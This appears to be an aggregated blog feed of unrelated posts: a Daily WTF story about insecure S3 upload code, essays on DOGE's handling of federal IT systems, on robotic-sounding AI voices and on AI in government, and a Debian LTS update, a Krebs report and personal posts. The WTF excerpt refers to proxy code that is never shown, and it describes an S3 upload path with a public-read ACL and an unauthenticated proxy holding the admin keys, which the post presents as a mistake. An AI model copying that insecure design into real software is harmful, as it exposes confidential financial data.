Note: Nightly builds may contain experimental features and are not guaranteed to be as stable as the official releases. Also, the nightly builds target only Ubuntu 24.04 and later, including the current development release.
If you need to revert to the stable version later, remove the nightly PPA and reinstall Wireshark:
Gretchen saw this line in the front-end code for their website and freaked out:
let bucket = new AWS.S3({ params: { Bucket: 'initech-logos' } });
This appeared to be creating an object to interact with an Amazon S3 bucket on the client side. Which implied that tokens for interacting with S3 were available to anyone with a web browser.
Fortunately, Gretchen quickly realized that this line was commented out. They were not hosting publicly available admin credentials on their website anymore.
They used to, however, and the comments in the code made this a bit more clear:
// inside an angular component:
uploadImage(): void {
    const uniqueName = `${this.utils.generateUUID()}_${this.encrDecSrvc.getObject(AppConstants.companyID)}_${this.file.name}`
    /*;
    @note:
    Disable usage of aws credential, transfer flow to the backend.
    @note;
    @disable-aws-credential
    */
    /*;
    AWS.config.region = 'us-east-1'
    let bucket = new AWS.S3({ params: { Bucket: 'initech-billinglogos' } });
    */
    const bucket = (
        AWSBucketMask
    );
    const params = { Bucket: 'initech-logos', Key: 'userprofilepic/' + uniqueName, ACL: "public-read", Body: this.file };
    const self = this;
    bucket.upload(
        params,
        function (err, data) {
            if (err) {
                console.log("error while saving file on s3 server", err);
                return;
            }
            self.isImageUrl = true;
            self.imageUrl = data.Location;
            self.myProfileForm.controls['ProfilePic'].setValue(self.imageUrl);
            self.encrDecSrvc.addObject(AppConstants.imageUrl, self.imageUrl);
            self.initechAPISrvc.fireImageView(true);
            self.saveProfileData();
            self.fileUpload.clear()
        },
        self.APISrvc
    );
}
Boy, this makes me wonder what that AWSBucketMask object is, and what its upload function does.
The important thing to notice here is that each of the methods here invokes a web service (service.awsBucketMaskUpload, for example). Given that nothing actually checks their return values and it's all handled through callback hell, this is a clear example of async pollution: methods being marked async without understanding what async is supposed to do.
But that's not the real WTF. You may notice that these calls back to the webservice are pretty thin. You see, here's the problem: originally, they just bundled the S3 into the client-side, so the client-side code could do basically anything it wanted to in S3. Adding a service to "mask" that behavior would have potentially meant doing a lot of refactoring, so instead they made the service just a dumb proxy. Anything you want to do on S3, the service does for you. It does no authentication. It does no authorization. It runs with the admin keys, so if you can imagine a request you want to send it, you can send it that request. But at least the client doesn't have access to the admin keys any more.
This is an accounting application, so some of the things stored in S3 are confidential financial information.
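For contrast, and purely as an illustrative sketch (not something from the article), a backend that wants to keep the S3 credentials server-side typically authorizes the caller and hands back a short-lived presigned upload URL scoped to a single key. The function below assumes boto3 and reuses the bucket name and key prefix from the snippet above; the user_id would come from whatever authentication layer the backend already has.
# Hypothetical sketch of a safer upload path: the server keeps the AWS credentials,
# checks who is asking, chooses the object key itself, and returns a presigned
# URL that is only valid briefly and only for that one object.
import uuid
import boto3

s3 = boto3.client("s3")

def presigned_profile_pic_url(user_id: str, bucket: str = "initech-logos") -> dict:
    # The server, not the client, picks the key; user_id comes from the
    # backend's own authentication, not from anything the client claims.
    key = f"userprofilepic/{user_id}/{uuid.uuid4()}"
    url = s3.generate_presigned_url(
        "put_object",
        Params={"Bucket": bucket, "Key": key},
        ExpiresIn=300,  # the URL expires after five minutes
    )
    return {"url": url, "key": key}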
Gretchen writes:
We have to take cybersecurity courses every 3 months, but it seems like this has no effect on the capabilities of my fellow coworkers.
You can lead a programmer to education, but you can't make them think.
Author: Emily Kinsey I pull the string from my son’s arm. It’s long—seven inches, at least—and shimmers like spun silver. Exhaling slowly, I put down my tweezers and rub my eyes. That last string took too long; the tail almost got away. If nothing else, pulling strings is the most tedious work I’ve ever encountered. […]
One thing I've learned by going through our reader submissions over the years is that WTFs never start with just one mistake. They're a compounding sequence of systemic failures. When we have a "bad boss" story, where an incompetent bully puts an equally incompetent sycophant in charge of a project, it's never just about the bad boss- it's about the system that put the bad boss in that position. For every "Brillant" programmer, there's a whole slew of checkpoints which should have stopped them before they went too far.
With all that in mind, today we're doing a news roundup about the worst boss of them all, the avatar of Dunning-Kruger, Elon Musk. Because over the past month, a lot has happened, and there are enough software and IT related WTFs that I need to talk about them.
For those who haven't been paying attention, President Trump assembled a new task force called the "Department of Government Efficiency", aka "DOGE". Like all terrible organizations, its mandate is unclear, its scope is unspecified, and its power to execute is unbounded.
Now, before we get into it, we have to talk about the name. Like so much of Musk's persona, it's an unfunny joke. In this case, just a reference to Dogecoin, a meme currency based on a meme image that Musk has "invested" in. This is part of a pattern of unfunny jokes, like strolling around Twitter headquarters with a sink, or getting your product lines to spell S3XY. This has nothing to do with the news roundup, I just suspect that Musk's super-villain origin story was getting booed off the stage at a standup open-mic night and then he got roasted by the emcee. Everything else he's ever done has been an attempt to convince the world that he's cool and popular and funny.
One of the core activities at DOGE is to be a "woodchipper", as Musk puts it. Agencies Musk doesn't like are just turned off, like USAID.
The United States Agency for International Development handles all of the US foreign aid. Now, there's certainly room for debate over how, why, and how much aid the US provides abroad, and that's a great discussion that I wouldn't have here. But there's a very practical consideration beyond the "should/should not" debate: people currently depend on it.
Farmers in the US depend on USAID purchasing excess crops to stabilize food prices. Abroad, people will die without the support they've been receiving.
Even if you think aid should be ended entirely, simply turning off the machine while people are using it will cause massive harm. But none of this should come as a surprise, because Musk loves to promote his "algorithm".
Calling it an "algorithm" is just a way to make it sound smarter than it is; Musk's "algorithm" is really a 5-step plan of bumper-sticker business speak that ranges from fatuous to incompetent, and not even the fawning coverage in the article I linked can truly disguise it.
For example, step 1 is "question every requirement", which is obvious: of course, if you're trying to make this more efficient, you should question the requirements. As a sub-head on that, though, Musk says that requirements should be traceable directly to individuals, not departments. On one hand, this could be good for accountability, but on the other, any sufficiently complex system is going to have requirements that have to be built through collaboration, where any individual claiming the requirement is really just doing so to be a point of accountability.
Step 2 also has a blindingly obvious label: "delete any part of the process you can". Oh, very good, why didn't I think of that! But Musk has a "unique" way of figuring out what parts of the process can be deleted: "You may have to add them back later. In fact, if you do not end up adding back at least 10 percent of them, then you didn’t delete enough."
Or, to put it less charitably: break things, and then unbreak them when you realize what you broke, if you do.
We can see how this plays out in practice, because Musk played this game when he took over Twitter. And sure, its revenue has collapsed, but we don't care about that here. What we care about are stupid IT stories, like the new owner renting a U-Haul and hiring a bunch of gig workers to manually decommission an expensive data center. Among the parts of the process Musk deleted were:
Shutting down the servers in an orderly fashion
Using the proper tools to uninstall the server racks
Protecting the flooring which wasn't designed to roll 2,500lb server racks
Wiping the hard drives which contained user data and proprietary information
Securing that valuable data with anything more than a set of Home Depot padlocks and Apple AirTags
And, shockingly, despite thinking this was successful in the moment, the resulting instability caused by just ripping a datacenter out led Musk to admit this was a mistake.
So let's take a look at how this plays out with DOGE. One of the major efforts was taking over the Treasury Department's IT systems. These are systems which handle $5 trillion in payments every year. And who do we put in charge? Some random wet-behind-the-ears dev with a history of racist posts on the Internet.
Part of the goal was to just stop payments, following the Muskian "Break things first, and unbreak them if it was a mistake," optimization strategy. Stop paying people, and if you find out you needed to pay them, then start paying them again. Step 2 of the "algorithm".
Speaking of payments, many people in the US depend on payments from the Social Security Administration. This organization, founded in 1935 as part of the New Deal, handles all sorts of benefits, including retirement benefits. According to Musk, it's absolutely riddled with fraud.
What are his arguments? Well, for starters, he worries that SSNs are not de-duplicated: that is, the same SSN could appear multiple times in the database.
The Social Security Administration has, since the 1940s, been trying to argue against using SSNs as identifiers for any purpose other than Social Security. They have a history page which is a delightful read as a "we can't say the Executive Orders and laws passed which expanded the use of SSNs into domains where they shouldn't have been used was a bad idea, but we can be real salty about it," document. It's passive-aggression perfected. But you and I already know you should never expect SSNs to be a key.
Also, assuming the SSA systems are mainframe systems, using flat file databases, we would expect a large degree of denormalization. Seeing "unique" keys repeated in the dataset is normal.
On the same subject, Musk has decided that people over 150 years old are collecting Social Security benefits. Now, one could assume that this kind of erroneous data pattern is fraud, or we could wonder if there's an underlying reason for the pattern.
Now, I've seen a lot of discussion on the Internet about this being an epoch related thing, which is certainly possible, but I think the idea that it's related to ISO8601 is obviously false: ISO8601 is just a string representation of dates, and it was also standardized well after COBOL and well after SSA started computerizing. Because the number 150 was used, some folks have noted that would be 1875, and have suspected that the date of the Metre Convention is the epoch.
I can't find any evidence that any of this is true, mind you, but we're also reacting to a tweet by a notorious moron, and I have to wonder: did he maybe round off 5 years? Because 1870 is exactly 65 years before 1935, the year Social Security started, and 65 years is the retirement age at which you can start collecting Social Security. Thus, the oldest date which the SSA would ever care about was 1870. Though, there's another completely un-epoch related reason why you could have Social Security accounts well older than 150 years: your benefits can continue to be paid out to your spouse and dependents after your death. If an 80-year-old marries a 20-year-old, and dies the next day, that 20-year-old could collect benefits on that account.
The key point I'm making is that "FRAUUUDDDD!!1111!!!" is really not the correct reaction to a system you don't understand. And while there may be many better ways to handle dates within the SSA's software, the system predates computers and has needed to maintain its ability to pay benefits for 90 years. While you could certainly make improvements, what you can't do is take a big "algorithm" Number 2 all over it.
There are so, so many more things that could be discussed here, but let's close with the DOGE website. Given that DOGE operates by walking into government agencies and threatening to call Elon, there are some serious concerns over transparency. Who is doing what, when, why and with what authority? The solution? Repost a bunch of tweets to a website with a .gov domain name.
In the end, the hacked website is really just Elon Musk's "algorithm" improved: instead of breaking things that are already working, you just start with a broken website.
Author: Julian Miles, Staff Writer He’s going to watch it again. Unbelievable. “Any chance of a coffee?” The stare is a definite ‘no’ with an attempt at being hard. “You can ask for details. I was there.” Plus I have complete recall thanks to my action audit unit. I got it turned on after some […]
Author: Alastair Millar I should have said something. Today, I know that—but back then, I was still young and stupid. So I’m recording this now that I’m old and hopefully wiser, for all the good it will do. I was desperate when I signed up for the Settler Corps, with nothing left after a layoff […]
In the span of just weeks, the US government has experienced what may be the most consequential security breach in its history—not through a sophisticated cyberattack or an act of foreign espionage, but through official orders by a billionaire with a poorly defined government role. And the implications for national security are profound.
First, it was reported that people associated with the newly created Department of Government Efficiency (DOGE) had accessed the US Treasury computer system, giving them the ability to collect data on and potentially control the department’s roughly $5.45 trillion in annual federal payments.
Then, we learned that uncleared DOGE personnel had gained access to classified data from the US Agency for International Development, possibly copying it onto their own systems. Next, the Office of Personnel Management—which holds detailed personal data on millions of federal employees, including those with security clearances—was compromised. After that, Medicaid and Medicare records were compromised.
Meanwhile, only partially redacted names of CIA employees were sent over an unclassified email account. DOGE personnel are also reported to be feeding Education Department data into artificial intelligence software, and they have also started working at the Department of Energy.
This story is moving very fast. On Feb. 8, a federal judge blocked the DOGE team from accessing the Treasury Department systems any further. But given that DOGE workers have already copied data and possibly installed and modified software, it’s unclear how this fixes anything.
In any case, breaches of other critical government systems are likely to follow unless federal employees stand firm on the protocols protecting national security.
The systems that DOGE is accessing are not esoteric pieces of our nation’s infrastructure—they are the sinews of government.
For example, the Treasury Department systems contain the technical blueprints for how the federal government moves money, while the Office of Personnel Management (OPM) network contains information on who and what organizations the government employs and contracts with.
What makes this situation unprecedented isn’t just the scope, but also the method of attack. Foreign adversaries typically spend years attempting to penetrate government systems such as these, using stealth to avoid being seen and carefully hiding any tells or tracks. The Chinese government’s 2015 breach of OPM was a significant US security failure, and it illustrated how personnel data could be used to identify intelligence officers and compromise national security.
In this case, external operators with limited experience and minimal oversight are doing their work in plain sight and under massive public scrutiny: gaining the highest levels of administrative access and making changes to the United States’ most sensitive networks, potentially introducing new security vulnerabilities in the process.
But the most alarming aspect isn’t just the access being granted. It’s the systematic dismantling of security measures that would detect and prevent misuse—including standard incident response protocols, auditing, and change-tracking mechanisms—by removing the career officials in charge of those security measures and replacing them with inexperienced operators.
The Treasury’s computer systems have such an impact on national security that they were designed with the same principle that guides nuclear launch protocols: No single person should have unlimited power. Just as launching a nuclear missile requires two separate officers turning their keys simultaneously, making changes to critical financial systems traditionally requires multiple authorized personnel working in concert.
This approach, known as “separation of duties,” isn’t just bureaucratic red tape; it’s a fundamental security principle as old as banking itself. When your local bank processes a large transfer, it requires two different employees to verify the transaction. When a company issues a major financial report, separate teams must review and approve it. These aren’t just formalities—they’re essential safeguards against corruption and error. These measures have been bypassed or ignored. It’s as if someone found a way to rob Fort Knox by simply declaring that the new official policy is to fire all the guards and allow unescorted visits to the vault.
The implications for national security are staggering. Sen. Ron Wyden said his office had learned that the attackers gained privileges that allow them to modify core programs in Treasury Department computers that verify federal payments, access encrypted keys that secure financial transactions, and alter audit logs that record system changes. Over at OPM, reports indicate that individuals associated with DOGE connected an unauthorized server into the network. They are also reportedly training AI software on all of this sensitive data.
This is much more critical than the initial unauthorized access. These new servers have unknown capabilities and configurations, and there’s no evidence that this new code has gone through any rigorous security testing protocols. The AIs being trained are certainly not secure enough for this kind of data. All are ideal targets for any adversary, foreign or domestic, also seeking access to federal data.
There’s a reason why every modification—hardware or software—to these systems goes through a complex planning process and includes sophisticated access-control mechanisms. The national security crisis is that these systems are now much more vulnerable to dangerous attacks at the same time that the legitimate system administrators trained to protect them have been locked out.
By modifying core systems, the attackers have not only compromised current operations, but have also left behind vulnerabilities that could be exploited in future attacks—giving adversaries such as Russia and China an unprecedented opportunity. These countries have long targeted these systems. And they don’t just want to gather intelligence—they also want to understand how to disrupt these systems in a crisis.
The technical details of how these systems operate, their security protocols, and their vulnerabilities are now potentially exposed to unknown parties without any of the usual safeguards. Instead of having to breach heavily fortified digital walls, these parties can simply walk through doors that are being propped open—and then erase evidence of their actions.
The security implications span three critical areas.
First, system manipulation: External operators can now modify operations while also altering audit trails that would track their changes. Second, data exposure: Beyond accessing personal information and transaction records, these operators can copy entire system architectures and security configurations—in one case, the technical blueprint of the country’s federal payment infrastructure. Third, and most critically, is the issue of system control: These operators can alter core systems and authentication mechanisms while disabling the very tools designed to detect such changes. This is more than modifying operations; it is modifying the infrastructure that those operations use.
To address these vulnerabilities, three immediate steps are essential. First, unauthorized access must be revoked and proper authentication protocols restored. Next, comprehensive system monitoring and change management must be reinstated—which, given the difficulty of cleaning a compromised system, will likely require a complete system reset. Finally, thorough audits must be conducted of all system changes made during this period.
This is beyond politics—this is a matter of national security. Foreign national intelligence organizations will be quick to take advantage of both the chaos and the new insecurities to steal US data and install backdoors to allow for future access.
Each day of continued unrestricted access makes the eventual recovery more difficult and increases the risk of irreversible damage to these critical systems. While the full impact may take time to assess, these steps represent the minimum necessary actions to begin restoring system integrity and security protocols.
Assuming that anyone in the government still cares.
This essay was written with Davi Ottenheimer, and originally appeared in Foreign Policy.
Most people know that robots no longer sound like tinny trash cans. They sound like Siri, Alexa, and Gemini. They sound like the voices in labyrinthine customer support phone trees. And even those robot voices are being made obsolete by new AI-generated voices that can mimic every vocal nuance and tic of human speech, down to specific regional accents. And with just a few seconds of audio, AI can now clone someone’s specific voice.
This technology will replace humans in many areas. Automated customer support will save money by cutting staffing at call centers. AI agents will make calls on our behalf, conversing with others in natural language. All of that is happening, and will be commonplace soon.
But there is something fundamentally different about talking with a bot as opposed to a person. A person can be a friend. An AI cannot be a friend, despite how people might treat it or react to it. AI is at best a tool, and at worst a means of manipulation. Humans need to know whether we’re talking with a living, breathing person or a robot with an agenda set by the person who controls it. That’s why robots should sound like robots.
You can’t just label AI-generated speech. It will come in many different forms. So we need a way to recognize AI that works no matter the modality. It needs to work for long or short snippets of audio, even just a second long. It needs to work for any language, and in any cultural context. At the same time, we shouldn’t constrain the underlying system’s sophistication or language complexity.
We have a simple proposal: all talking AIs and robots should use a ring modulator. In the mid-twentieth century, before it was easy to create actual robotic-sounding speech synthetically, ring modulators were used to make actors’ voices sound robotic. Over the last few decades, we have become accustomed to robotic voices, simply because text-to-speech systems were good enough to produce intelligible speech that was not human-like in its sound. Now we can use that same technology to make robotic speech that is indistinguishable from human speech sound robotic again.
A ring modulator has several advantages: It is computationally simple, can be applied in real-time, does not affect the intelligibility of the voice, and—most importantly—is universally “robotic sounding” because of its historical usage for depicting robots.
Responsible AI companies that provide voice synthesis or AI voice assistants in any form should add a ring modulator of some standard frequency (say, between 30 and 80 Hz) and of a minimum amplitude (say, 20 percent). That’s it. People will catch on quickly.
Here are a couple of examples you can listen to for examples of what we’re suggesting. The first clip is an AI-generated “podcast” of this article made by Google’s NotebookLM featuring two AI “hosts.” Google’s NotebookLM created the podcast script and audio given only the text of this article. The next two clips feature that same podcast with the AIs’ voices modulated more and less subtly by a ring modulator:
Raw audio sample generated by Google’s NotebookLM
Audio sample with added ring modulator (30 Hz-25%)
Audio sample with added ring modulator (30 Hz-40%)
We were able to generate the audio effect with a 50-line Python script generated by Anthropic’s Claude. Some of the most well-known robot voices were those of the Daleks from Doctor Who in the 1960s. Back then robot voices were difficult to synthesize, so the audio was actually an actor’s voice run through a ring modulator. It was set to around 30 Hz, as we did in our example, with different modulation depths (amplitudes) depending on how strong the robotic effect was meant to be. Our expectation is that the AI industry will test and converge on a good balance of such parameters and settings, and will use better tools than a 50-line Python script, but this highlights how simple it is to achieve.
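For the curious, here is a minimal sketch of such a ring modulator (our own illustration, not the 50-line script mentioned above). It assumes a mono 16-bit WAV input, uses numpy and scipy, and treats the depth parameter as a dry/wet mix; the file names are placeholders.
# Minimal ring modulator sketch: multiply the voice by a low-frequency sine carrier
# and mix it back in with the dry signal according to `depth`.
# Assumes a mono 16-bit PCM WAV file; this is an illustration, not the authors' script.
import numpy as np
from scipy.io import wavfile

def ring_modulate(in_path, out_path, carrier_hz=30.0, depth=0.25):
    rate, samples = wavfile.read(in_path)           # sample rate and int16 samples
    x = samples.astype(np.float64) / 32768.0        # normalize to [-1, 1]
    t = np.arange(len(x)) / rate                    # time axis in seconds
    carrier = np.sin(2 * np.pi * carrier_hz * t)    # low-frequency sine carrier
    y = (1.0 - depth) * x + depth * (x * carrier)   # dry/wet mix
    wavfile.write(out_path, rate, (y * 32767).astype(np.int16))

if __name__ == "__main__":
    # Placeholder file names; point these at a real recording.
    ring_modulate("voice.wav", "voice_robotic.wav", carrier_hz=30.0, depth=0.25)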
Of course there will also be nefarious uses of AI voices. Scams that use voice cloning have been getting easier every year, but they’ve been possible for many years with the right know-how. Just like we’re learning that we can no longer trust images and videos we see because they could easily have been AI-generated, we will all soon learn that someone who sounds like a family member urgently requesting money may just be a scammer using a voice-cloning tool.
We don’t expect scammers to follow our proposal: They’ll find a way no matter what. But that’s always true of security standards, and a rising tide lifts all boats. We think the bulk of the uses will be with popular voice APIs from major companies—and everyone should know that they’re talking with a robot.
This essay was written with Barath Raghavan, and originally appeared in IEEE Spectrum.
I wanted to follow new content posted to Printables.com
with a feed reader, but Printables.com doesn't provide one. Neither do the other
obvious 3d model catalogues. So, I started building one.
I have something that spits out an Atom feed and a couple of beta testers gave
me some valuable feedback. I had planned to make it public, with the ultimate
goal being to convince Printables.com to implement feeds themselves.
Meanwhile, I stumbled across someone else who has done basically the same thing.
Here are 3rd party feeds for
The format of their feeds is JSON Feed,
which is new to me (a minimal example of the format is sketched below). FreshRSS and
NetNewsWire seem happy with it. (I went with
Atom.) I may still release my take, if I find time to make one improvement that
my beta-testers suggested.
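For reference, a JSON Feed document is just a small JSON object. A minimal sketch (with made-up entries and URLs, not the actual third-party feeds) might look like this, here built with Python's json module:
# Minimal JSON Feed sketch; the entries and URLs are purely illustrative.
import json

feed = {
    "version": "https://jsonfeed.org/version/1.1",
    "title": "New 3d models",
    "home_page_url": "https://example.com/",
    "items": [
        {
            "id": "https://example.com/model/1",
            "url": "https://example.com/model/1",
            "title": "Example model",
            "date_published": "2025-02-14T12:00:00Z",
            "content_text": "A new 3d model was published.",
        },
    ],
}

print(json.dumps(feed, indent=2))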
Because we still have the NWS, I learned that "A winter storm will continue
to bring areas of heavy snow and ice from the Great Lakes through New England
today into tonight." I'm staying put, and apparently so is Dave L.'s
delivery driver.
Dave L.
imagines the thoughts of this driver who clearly turned around and headed straight home.
"Oh, d'ya mean I've got to take these parcels somewhere!? in this weather!? I can't just bring them back?"
Infoscavenger
Andrew G.
shared a found object.
"I got this from https://bsky.app/profile/jesseberney.com/post/3lhyiubtay22r and
immediately thought of you. Sadly I expect you're
going to get more of these in the coming days/weeks." I guess they already fired all
the people who knew how to use Mail Merge.
Bruce R.
"I saw this ad in my Android weather app. They think they know all about you, but they got this completely wrong:
I don't live in {city}, I live in [city]!" Right next to Mr. [EmployeeLastName].
"I've got a vintage k8s cluster if anyone's interested," reports
Mike S.
"I just installed docker desktop. Apparently it ships with the zeroeth version of kubernetes."
Finally for this week, special character
Vitra
has sent us an elliptical statement about her uni application.
"Of course, putting characters in my personal statement is simply a bad idea - it's best to let the Universities have the thrill of mystery!
(From UCAS, the main university application thing in the UK too!)
"
Keep warm.
Author: Dart Humeston “The last time I felt like this, I woke up in the year 1981.” I explained to the attractive woman after I appeared out of thin air in her kitchen. “I sensed static electricity in my body and materialized in a video game arcade in Miami,” I continued, as she stood with […]
There were numerous security and non-security updates to Debian 11 (codename “bullseye”) during January.
Notable security updates:
rsync, prepared by Thorsten Alteholz, fixed several CVEs (including information leak and path traversal vulnerabilities)
tomcat9, prepared by Markus Koschany, fixed several CVEs (including denial of service and information disclosure vulnerabilities)
ruby2.7, prepared by Bastien Roucariès, fixed several CVEs (including denial of service vulnerabilities)
tiff, prepared by Adrian Bunk, fixed several CVEs (including NULL pointer, buffer overflow, use-after-free, and segfault vulnerabilities)
Notable non-security updates:
linux-6.1, prepared by Ben Hutchings, has been packaged for bullseye (this was done specifically to provide a supported upgrade path for systems that currently use kernel packages from the “bullseye-backports” suite)
debian-security-support, prepared by Santiago Ruano Rincón, which formalized the EOL of intel-mediasdk and node-matrix-js-sdk
In addition to the security and non-security updates targeting “bullseye”, various LTS contributors have prepared uploads targeting Debian 12 (codename “bookworm”) with fixes for a variety of vulnerabilities. Abhijith PA prepared an upload of puma; Bastien Roucariès prepared an upload of node-postcss with fixes for data processing and denial of service vulnerabilities; Daniel Leidert prepared updates for setuptools, python-asyncssh, and python-tornado; Lee Garrett prepared an upload of ansible-core; and Guilhem Moulin prepared updates for python-urllib3, sqlparse, and opensc. Santiago Ruano Rincón also worked on tracking and filing some issues about packages that need an update in recent releases to avoid regressions on upgrade. This relates to CVEs that were fixed in buster or bullseye, but remain open in bookworm. These updates, along with Santiago’s work on identifying and tracking similar issues, underscore the LTS Team’s commitment to ensuring that the work we do as part of LTS also benefits the current Debian stable release.
LTS contributor Sean Whitton also prepared an upload of jinja2 and Santiago Ruano Rincón prepared an upload of openjpeg2 for Debian unstable (codename “sid”), as part of the LTS Team effort to assist with package uploads to unstable.
In mid-March 2024, KrebsOnSecurity revealed that the founder of the personal data removal service Onerep also founded dozens of people-search companies. Shortly after that investigation was published, Mozilla said it would stop bundling Onerep with the Firefox browser and wind down its partnership with the company. But nearly a year later, Mozilla is still promoting it to Firefox users.
Mozilla offers Onerep to Firefox users on a subscription basis as part of Mozilla Monitor Plus. Launched in 2018 under the name Firefox Monitor, Mozilla Monitor also checks data from the website Have I Been Pwned? to let users know when their email addresses or passwords are leaked in data breaches.
The ink on that partnership agreement had barely dried before KrebsOnSecurity published a story showing that Onerep’s Belarusian CEO and founder Dimitri Shelest had launched dozens of people-search services since 2010, including a still-active data broker called Nuwber that sells background reports on people. This seemed to contradict Onerep’s stated motto, “We believe that no one should compromise personal online security and get a profit from it.”
Shelest released a lengthy statement (PDF) wherein he acknowledged maintaining an ownership stake in Nuwber, a consumer data broker he founded in 2015 — around the same time he started Onerep.
Onerep.com CEO and founder Dimitri Shelest, as pictured on the “about” page of onerep.com.
Shelest maintained that Nuwber has “zero cross-over or information-sharing with Onerep,” and said any other old domains that may be found and associated with his name are no longer being operated by him.
“I get it,” Shelest wrote. “My affiliation with a people search business may look odd from the outside. In truth, if I hadn’t taken that initial path with a deep dive into how people search sites work, Onerep wouldn’t have the best tech and team in the space. Still, I now appreciate that we did not make this more clear in the past and I’m aiming to do better in the future.”
When asked to comment on the findings, Mozilla said then that although customer data was never at risk, the outside financial interests and activities of Onerep’s CEO did not align with their values.
“We’re working now to solidify a transition plan that will provide customers with a seamless experience and will continue to put their interests first,” Mozilla said.
In October 2024, Mozilla published a statement saying the search for a different provider was taking longer than anticipated.
“While we continue to evaluate vendors, finding a technically excellent and values-aligned partner takes time,” Mozilla wrote. “While we continue this search, Onerep will remain the backend provider, ensuring that we can maintain uninterrupted services while we continue evaluating new potential partners that align more closely with Mozilla’s values and user expectations. We are conducting thorough diligence to find the right vendor.”
Asked for an update, Mozilla said the search for a replacement partner continues.
“The work’s ongoing but we haven’t found the right alternative yet,” Mozilla said in an emailed statement. “Our customers’ data remains safe, and since the product provides a lot of value to our subscribers, we’ll continue to offer it during this process.”
It’s a win-win for Mozilla that they’ve received accolades for their principled response while continuing to partner with Onerep almost a year later. But if it takes so long to find a suitable replacement, what does that say about the personal data removal industry itself?
Onerep appears to be working in partnership with another problematic people-search service: Radaris, which has a history of ignoring opt-out requests or failing to honor them. A week before breaking the story about Onerep, KrebsOnSecurity published research showing the co-founders of Radaris were two native Russian brothers who’d built a vast network of affiliate marketing programs and consumer data broker services.
Lawyers for the Radaris co-founders threatened to sue KrebsOnSecurity unless that story was retracted in full, claiming the founders were in fact Ukrainian and that our reporting had defamed the brothers by associating them with the actions of Radaris. Instead, we published a follow-up investigation which showed that not only did the brothers from Russia create Radaris, for many years they issued press releases quoting a fictitious CEO seeking money from investors.
Several readers have shared emails they received from Radaris after attempting to remove their personal data, and those messages show Radaris has been promoting Onerep.
Donald Trump and Elon Musk’s chaotic approach to reform is upending government operations. Critical functions have been halted, tens of thousands of federal staffers are being encouraged to resign, and congressional mandates are being disregarded. The next phase: The Department of Government Efficiency reportedly wants to use AI to cut costs. According to The Washington Post, Musk’s group has started to run sensitive data from government systems through AI programs to analyze spending and determine what could be pruned. This may lead to the elimination of human jobs in favor of automation. As one government official who has been tracking Musk’s DOGE team told the Post, the ultimate aim is to use AI to replace “the human workforce with machines.” (Spokespeople for the White House and DOGE did not respond to requests for comment.)
Using AI to make government more efficient is a worthy pursuit, and this is not a new idea. The Biden administration disclosed more than 2,000 AI applications in development across the federal government. For example, FEMA has started using AI to help perform damage assessment in disaster areas. The Centers for Medicare and Medicaid Services has started using AI to look for fraudulent billing. The idea of replacing dedicated and principled civil servants with AI agents, however, is new—and complicated.
The civil service—the massive cadre of employees who operate government agencies—plays a vital role in translating laws and policy into the operation of society. New presidents can issue sweeping executive orders, but they often have no real effect until they actually change the behavior of public servants. Whether you think of these people as essential and inspiring do-gooders, boring bureaucratic functionaries, or as agents of a “deep state,” their sheer number and continuity act as ballast that resists institutional change.
This is why Trump and Musk’s actions are so significant. The more AI decision making is integrated into government, the easier change will be. If human workers are widely replaced with AI, executives will have unilateral authority to instantaneously alter the behavior of the government, profoundly raising the stakes for transitions of power in democracy. Trump’s unprecedented purge of the civil service might be the last time a president needs to replace the human beings in government in order to dictate its new functions. Future leaders may do so at the press of a button.
To be clear, the use of AI by the executive branch doesn’t have to be disastrous. In theory, it could allow new leadership to swiftly implement the wishes of its electorate. But this could go very badly in the hands of an authoritarian leader. AI systems concentrate power at the top, so they could allow an executive to effectuate change over sprawling bureaucracies instantaneously. Firing and replacing tens of thousands of human bureaucrats is a huge undertaking. Swapping one AI out for another, or modifying the rules that those AIs operate by, would be much simpler.
Social-welfare programs, if automated with AI, could be redirected to systematically benefit one group and disadvantage another with a single prompt change. Immigration-enforcement agencies could prioritize people for investigation and detainment with one instruction. Regulatory-enforcement agencies that monitor corporate behavior for malfeasance could turn their attention to, or away from, any given company on a whim.
Even if Congress were motivated to fight back against Trump and Musk, or against a future president seeking to bulldoze the will of the legislature, the absolute power to command AI agents would make it easier to subvert legislative intent. AI has the power to diminish representative politics. Written law is never fully determinative of the actions of government—there is always wiggle room for presidents, appointed leaders, and civil servants to exercise their own judgment. Whether intentional or not, whether charitably or not, each of these actors uses discretion. In human systems, that discretion is widely distributed across many individuals—people who, in the case of career civil servants, usually outlast presidencies.
Today, the AI ecosystem is dominated by a small number of corporations that decide how the most widely used AI models are designed, which data they are trained on, and which instructions they follow. Because their work is largely secretive and unaccountable to public interest, these tech companies are capable of making changes to the bias of AI systems—either generally or with aim at specific governmental use cases—that are invisible to the rest of us. And these private actors are both vulnerable to coercion by political leaders and self-interested in appealing to their favor. Musk himself created and funded xAI, now one of the world’s largest AI labs, with an explicitly ideological mandate to generate anti-“woke” AI and steer the wider AI industry in a similar direction.
But there’s a second way that AI’s transformation of government could go. AI development could happen inside of transparent and accountable public institutions, alongside its continued development by Big Tech. Applications of AI in democratic governments could be focused on benefitting public servants and the communities they serve by, for example, making it easier for non-English speakers to access government services, making ministerial tasks such as processing routine applications more efficient and reducing backlogs, or helping constituents weigh in on the policies deliberated by their representatives. Such AI integrations should be done gradually and carefully, with public oversight for their design and implementation and monitoring and guardrails to avoid unacceptable bias and harm.
Governments around the world are demonstrating how this could be done, though it’s early days. Taiwan has pioneered the use of AI models to facilitate deliberative democracy at an unprecedented scale. Singapore has been a leader in the development of public AI models, built transparently and with public-service use cases in mind. Canada has illustrated the role of disclosure and public input on the consideration of AI use cases in government. Even if you do not trust the current White House to follow any of these examples, U.S. states—which have much greater contact and influence over the daily lives of Americans than the federal government—could lead the way on this kind of responsible development and deployment of AI.
As the political theorist David Runciman has written, AI is just another in a long line of artificial “machines” used to govern how people live and act, not unlike corporations and states before it. AI doesn’t replace those older institutions, but it changes how they function. As the Trump administration forges stronger ties to Big Tech and AI developers, we need to recognize the potential of that partnership to steer the future of democratic governance—and act to make sure that it does not enable future authoritarians.
This essay was written with Nathan E. Sanders, and originally appeared in The Atlantic.
I've just passed my 10th anniversary of starting at
Red Hat! As a personal milestone, this is the longest
I've stayed in a job: I managed 10 years at Newcastle University,
although not in one continuous role.
I haven't exactly worked in one continuous role at Red Hat either, but it
feels like what I do today is a logical evolution from what I started doing,
whereas in Newcastle I jumped around a bit.
I've seen some changes: in my time here, we changed the logo from Shadow Man;
we transitioned to using Google Workspace for lots of stuff, instead of
in-house IT; we got bought by IBM; we changed President and CEO, twice. And
millions of smaller things.
